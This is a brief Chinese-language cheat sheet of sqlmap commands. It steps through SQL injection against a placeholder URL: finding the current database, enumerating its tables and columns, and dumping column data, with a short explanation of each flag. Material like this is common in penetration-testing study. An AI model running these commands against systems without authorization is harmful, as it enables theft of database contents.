猜解数据库命令
sqlmap.py -u http://xxx --data "字符串" --batch --current-db
-u
:指定url,后面跟注入的地址
--data
: 通过POST发送的数据字字符串
--batch
: 从不询问用户输入,使用所有默认配置
--current-db
: 列出当前使用的数据库
对数据库的表进行猜解
sqlmap.py -u http://xxx --data "字符串" -D 数据库名 --tables
-D
: 指定数据库
--tables
: 对当前数据库中的表进行猜解
对表中的列名进行猜解
sqlmap.py -u http://xxx --data "字符串" -D 数据库名 -T 表明 --columns
-T
: 指定数据表
--columns
: 猜解当前表下的列内容
获取列数据
sqlmap.py -u http://xxx --data "字符串" -D 数据库名 -T 数据表名 -C 列名 --dump
-C
: 指定列
--dump
: 获取指定列的数据